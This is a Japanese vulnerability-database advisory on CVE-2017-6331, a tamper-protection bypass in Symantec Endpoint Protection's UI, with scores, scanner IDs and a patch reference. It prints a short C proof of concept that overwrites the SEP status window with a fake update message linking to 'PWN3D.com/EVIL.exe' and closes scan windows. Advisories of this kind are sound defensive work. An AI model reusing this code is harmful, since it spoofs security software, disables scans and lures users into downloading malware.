Symantec Endpoint Protection 迄 12.1.x/14.0 Real Time Protection UI 特権昇格
| CVSS 一時的なメタスコア | 現在のエクスプロイト価格 (≈) | CTI注目指数 |
|---|---|---|
| 3.9 | $0-$5k | 0.00 |
要約
Symantec Endpoint Protection 迄 12.1.x/14.0内に 問題がある として分類された脆弱性が発見されました。 影響を受けるのは、コンポーネント【Real Time Protection】の未知の関数です。 未知の値で改ざんすることが、 特権昇格を突く攻撃 「UI」に繋がります}。 この脆弱性は CVE-2017-6331 として扱われます。 この攻撃にアプローチするにはローカルアクセスが必要です。 攻撃手法は利用できません。 この問題を修正するためにパッチを適用することを推奨します。
詳細
Symantec Endpoint Protection 迄 12.1.x/14.0内に 問題がある として分類された脆弱性が発見されました。 影響を受けるのは、コンポーネント【Real Time Protection】の未知の関数です。 未知の値で改ざんすることが、 特権昇格を突く攻撃 「UI」に繋がります}。 CWEを使用して問題を宣言すると、CWE-284 につながります。 このバグは 2017年11月06日に発見されました。 この弱点は発表されました 2017年11月06日 John Page (hyp3rlinx)によって Security Advisoryとして (ウェブサイト)。 アドバイザリはsymantec.comにて共有されています。 公開情報のリリースはベンダーと協議済みです。
この脆弱性は CVE-2017-6331 として扱われます。 CVEの割り当ては2017年02月26日に行われました。 この攻撃にアプローチするにはローカルアクセスが必要です。 技術的な詳細は利用できません。 この脆弱性の普及度は平均未満です。 攻撃手法は利用できません。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。 MITRE ATT&CKプロジェクトはT1068という攻撃手法を宣言しています。 アドバイザリーは次を指摘しています。
The Symantec Endpoint Protection Windows endpoint can encounter an issue of Tamper-Protection Bypass, which is a type of attack that bypasses the real time protection for the application that is run on servers and clients. Tamper Protection protects Symantec processes and internal objects from these attacks that non-Symantec processes such as worms, Trojan horses, viruses, and security risks could make. Note that in this circumstance, the tamper-protection bypass only allows altering a small amount of text in one element of the UI.
概念実証 として宣言されています。 エクスプロイトのダウンロード先はexploit-db.comです。 脆弱性は、少なくとも 469 日の間、非公開の0day攻撃ツールとして扱われました。 0dayにはおよそ $0-$5k の価値があったと予想しています。 エクスプロイトで使用されたコードは次のとおりです:
void main(void){
while(1){
HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
if(hWnd!=NULL){
//This injects arbitrary messages to SEP UI.
SetWindowText(hWnd, "* Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. *");
//This prevents a user from being able to run AV scans and renders SEP UI useless
//SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
}
//HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
HWND x = FindWindow(NULL, TEXT("DevViewer"));
if(x!=NULL){
SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
}
HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
if(x!=NULL){
SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
}
sleep(1);
}
} 脆弱性スキャナーNessusはID【104459 (Symantec Endpoint Protection Client 12.1.x < 12.1 RU6 MP9 / 14.0.x < 14.0 RU1 Multiple Vulnerabilities (SYM17-011))】のプラグインを提供しています。不具合の有無をターゲット環境にて判定できます。 Windows ファミリーに分類されています。 プラグインはタイプ【 l 】のコンテキストで実行されています。 商用脆弱性スキャナーQualysではプラグイン【 370647 (Symantec Endpoint Protection Multiple Security Vulnerabilities (SYM17-011)) 】を使用してこの問題をテストできます。
14.0 RU1というパッチ名です。 この問題を修正するためにパッチを適用することを推奨します。
この脆弱性は他の脆弱性データベースにも記載されています: SecurityFocus (BID 101502) , Tenable (104459).
製品
タイプ
ベンダー
名前
バージョン
ライセンス
ウェブサイト
CPE 2.3
CPE 2.2
CVSSv4
VulDB ベクトル: 🔍VulDB 信頼性: 🔍
CVSSv3
VulDB ベースメタスコア: 4.2VulDB 一時的なメタスコア: 4.2
VulDB ベーススコア: 2.8
VulDB 一時的なスコア: 2.6
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍
ベンダー ベーススコア (Symantec): 2.8
ベンダー Vector (Symantec): 🔍
NVD ベーススコア: 7.1
NVD ベクトル: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| ベクトル | 複雑さ | 認証 | 機密性 | 完全性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
NVD ベーススコア: 🔍
悪用
名前: UIクラス: 特権昇格 / UI
CWE: CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
物理的: 部分的
ローカル: はい
リモート: 部分的
可用性: 🔍
アクセス: パブリック
ステータス: 概念実証
著者: hyp3rlinx
ダウンロード: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
Nessus ID: 104459
Nessus 名前: Symantec Endpoint Protection Client 12.1.x < 12.1 RU6 MP9 / 14.0.x < 14.0 RU1 Multiple Vulnerabilities (SYM17-011)
Nessus ファイル: 🔍
Nessus リスク: 🔍
Nessus ファミリー: 🔍
Nessus Context: 🔍
OpenVAS ID: 53886
OpenVAS 名前: Symantec Endpoint Protection Security Bypass Vulnerability (SYM17-011)
OpenVAS ファイル: 🔍
OpenVAS ファミリー: 🔍
Qualys ID: 🔍
Qualys 名前: 🔍
Exploit-DB: 🔍
脅威インテリジェンス
関心: 🔍アクティブアクター: 🔍
アクティブなAPTグループ: 🔍
対策
推奨: パッチステータス: 🔍
リアクション時間: 🔍
0day日時: 🔍
エクスプロイト遅延時間: 🔍
パッチ: 14.0 RU1
タイムライン
2016年07月08日 🔍2016年07月14日 🔍
2017年02月26日 🔍
2017年10月20日 🔍
2017年11月06日 🔍
2017年11月06日 🔍
2017年11月06日 🔍
2017年11月06日 🔍
2017年11月07日 🔍
2017年11月08日 🔍
2017年11月10日 🔍
2017年11月10日 🔍
2021年01月23日 🔍
ソース
ベンダー: symantec.com勧告: symantec.com
調査者: John Page (hyp3rlinx)
ステータス: 確認済み
確認: 🔍
調整済み: 🔍
CVE: CVE-2017-6331 (🔍)
GCVE (CVE): GCVE-0-2017-6331
GCVE (VulDB): GCVE-100-109175
SecurityFocus: 101502 - Symantec Endpoint Protection CVE-2017-6331 Local Security Bypass Vulnerability
SecurityTracker: 1039775
scip Labs: https://www.scip.ch/en/?labs.20161013
関連情報: 🔍
エントリ
作成済み: 2017年11月07日 08:06更新済み: 2021年01月23日 09:02
変更: 2017年11月07日 08:06 (107), 2019年12月10日 16:06 (2), 2021年01月23日 09:02 (2)
完了: 🔍
Cache ID: 216::103
Be aware that VulDB is the high quality source for vulnerability data.
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。